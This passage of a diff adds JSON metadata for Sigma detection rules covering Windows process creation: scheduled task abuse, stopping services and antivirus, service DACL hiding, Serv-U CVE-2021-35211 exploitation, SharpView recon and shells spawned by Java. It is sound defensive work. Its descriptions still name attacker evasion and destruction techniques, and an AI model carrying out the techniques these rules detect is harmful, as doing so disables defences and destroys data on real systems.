+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "This rule detects the execution of Run Once task as configured in the registry",
+ "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c",
+ "value": "Run Once Task Execution as Configured in Registry",
+ "meta": {
+ "refs": [
+ "https://twitter.com/pabraeken/status/990717080805789697",
+ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ],
+ "creation_date": "2020/10/18",
+ "filename": "proc_creation_win_susp_runonce_execution.yml",
+ "author": "Avneet Singh @v3t0_, oscd.community",
+ "level": "low",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of powershell scripts via Runscripthelper.exe",
+ "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03",
+ "value": "Suspicious Runscripthelper.exe",
+ "meta": {
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059",
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2020/10/09",
+ "filename": "proc_creation_win_susp_runscripthelper.yml",
+ "author": "Victor Sergeev, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious process run from unusual locations",
+ "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b",
+ "value": "Suspicious Process Start Locations",
+ "meta": {
+ "refs": [
+ "https://car.mitre.org/wiki/CAR-2013-05-002",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "car.2013-05-002"
+ ],
+ "creation_date": "2019/01/16",
+ "filename": "proc_creation_win_susp_run_locations.yml",
+ "author": "juju4, Jonhnathan Ribeiro, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')",
+ "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d",
+ "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location",
+ "meta": {
+ "refs": [
+ "https://redcanary.com/blog/misbehaving-rats/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/09/19",
+ "filename": "proc_creation_win_susp_rurat_exec_location.yml",
+ "author": "Nasreddine Bencherchali",
+ 
"level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n",
+ "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b",
+ "value": "Suspicious Modification Of Scheduled Tasks",
+ "meta": {
+ "refs": [
+ "Internal Research",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1053.005"
+ ],
+ "creation_date": "2022/07/28",
+ "filename": "proc_creation_win_susp_schtasks_change.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities",
+ "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78",
+ "value": "Delete Important Scheduled Task",
+ "meta": {
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1489"
+ ],
+ "creation_date": "2022/09/09",
+ "filename": "proc_creation_win_susp_schtasks_delete.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the usage 
of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.",
+ "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1",
+ "value": "Delete All Scheduled Tasks",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1489"
+ ],
+ "creation_date": "2022/09/09",
+ "filename": "proc_creation_win_susp_schtasks_delete_all.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities",
+ "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980",
+ "value": "Disable Important Scheduled Task",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
+ "https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1489"
+ ],
+ "creation_date": "2021/12/26",
+ "filename": "proc_creation_win_susp_schtasks_disable.yml",
+ "author": "frack113, Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects Schtask creations that point to a 
suspicious folder or an environment variable often used by malware",
+ "uuid": "81325ce1-be01-4250-944f-b4789644556f",
+ "value": "Suspicious Schtasks From Env Var Folder",
+ "meta": {
+ "refs": [
+ "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/",
+ "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1053.005"
+ ],
+ "creation_date": "2022/02/21",
+ "filename": "proc_creation_win_susp_schtasks_env_folder.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Benign scheduled tasks creations or executions that happen often during software installations",
+ "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects scheduled task creations that have suspicious action command and folder combinations",
+ "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb",
+ "value": "Schtasks From Suspicious Folders",
+ "meta": {
+ "refs": [
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1053.005"
+ ],
+ "creation_date": "2022/04/15",
+ "filename": "proc_creation_win_susp_schtasks_folder_combos.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder",
+ "uuid": "9494479d-d994-40bf-a8b1-eea890237021",
+ "value": 
"Suspicious Add Scheduled Task Parent",
+ "meta": {
+ "refs": [
+ "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1053.005"
+ ],
+ "creation_date": "2022/02/23",
+ "filename": "proc_creation_win_susp_schtasks_parent.yml",
+ "author": "Florian Roth",
+ "level": "medium",
+ "falsepositive": [
+ "Software installers that run from temporary folders and also install scheduled tasks"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious scheduled task creations with commands that are uncommon",
+ "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad",
+ "value": "Suspicious Add Scheduled Command Pattern",
+ "meta": {
+ "refs": [
+ "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1053.005"
+ ],
+ "creation_date": "2022/02/23",
+ "filename": "proc_creation_win_susp_schtasks_pattern.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Software installers that run from temporary folders and also install scheduled tasks"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects scheduled task creations or modification on a suspicious schedule type",
+ "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98",
+ "value": "Suspicious Schtasks Schedule Types",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitmate processes that run at logon. Filter according to your environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "value": "Suspicious Schtasks Schedule Type With High Privileges", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/08/31", + "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "schtasks.exe create task from user AppData\\Local\\Temp", + "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", + "value": "Suspicious Add Scheduled Task From User AppData Temp", + "meta": { + "refs": [ + "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2021/11/03", + "filename": "proc_creation_win_susp_schtasks_user_temp.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of scheduled tasks in user session", + "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", + "value": "Scheduled Task Creation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_schtask_creation.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "value": "Suspicious Scheduled Task Creation Involving Temp Folder", + "meta": { + "refs": [ + 
"https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2021/03/11", + "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity", + "Software installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "ScreenConnect Remote Access", + "meta": { + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ], + "creation_date": "2021/02/11", + "filename": "proc_creation_win_susp_screenconnect_access.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "value": "Suspicious ScreenSave Change by Reg.exe", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ], + "creation_date": "2021/08/19", + "filename": "proc_creation_win_susp_screensaver_reg.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "GPO" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious file execution by wscript and cscript", + "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "value": "WSF/JSE/JS/VBA/VBE File Execution", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_script_execution.yml", + "author": "Michael Haag", + "level": "medium", + "falsepositive": [ + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "value": "Script Interpreter Execution From Suspicious Folder", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/02/08", + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious script executions from temporary folder", + "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "value": "Suspicious Script Execution From Temp Folder", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_script_exec_from_temp.yml", + "author": "Florian Roth, Max Altgelt, Tim Shelton", + "level": "high", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", + "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "value": "Potential Suspicious Activity Using SeCEdit", + "meta": { + "refs": [ + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", + "attack.privilege_escalation", + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" + ], + "creation_date": "2022/11/18", + "filename": "proc_creation_win_susp_secedit.yml", + "author": "Janantha Marasinghe", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "value": "Suspicious Service DACL Modification", + "meta": { + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ], + "creation_date": "2020/10/16", + "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "author": "Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + 
"Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "meta": { + "refs": [ + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.003" + ], + "creation_date": "2022/10/18", + "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service binary running in a suspicious directory", + "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", + "value": "Suspicious Service Binary Directory", + "meta": { + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/03/09", + "filename": "proc_creation_win_susp_service_dir.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries 
may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", + "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", + "value": "Stop Or Remove Antivirus Service", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/07", + "filename": "proc_creation_win_susp_service_modification.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", + "value": "Suspicious Service Path Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_susp_service_path_modification.yml", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "value": "Suspicious Stop Windows Service", + "meta": { + "refs": [ + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1489" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_service_stop.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrator or tools shutting down the services due to upgrade or removal purposes. 
If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "uuid": "75578840-9526-4b2a-9462-af469a45e767", + "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "value": "Suspicious Serv-U Process Pattern", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_servu_process_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate uses in which users or programs use the SSH service of Serv-U for 
remote command execution" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "value": "Suspicious Execution of SharpView Aka PowerView", + "meta": { + "refs": [ + "https://github.com/tevora-threat/SharpView/", + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "creation_date": "2021/12/10", + "filename": "proc_creation_win_susp_sharpview.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", + "value": "Suspicious Usage Of ShellExec_RunDLL", + "meta": { + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", + "author": 
"Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "value": "Suspicious Shells Spawned by Java", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "creation_date": "2021/12/17", + "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
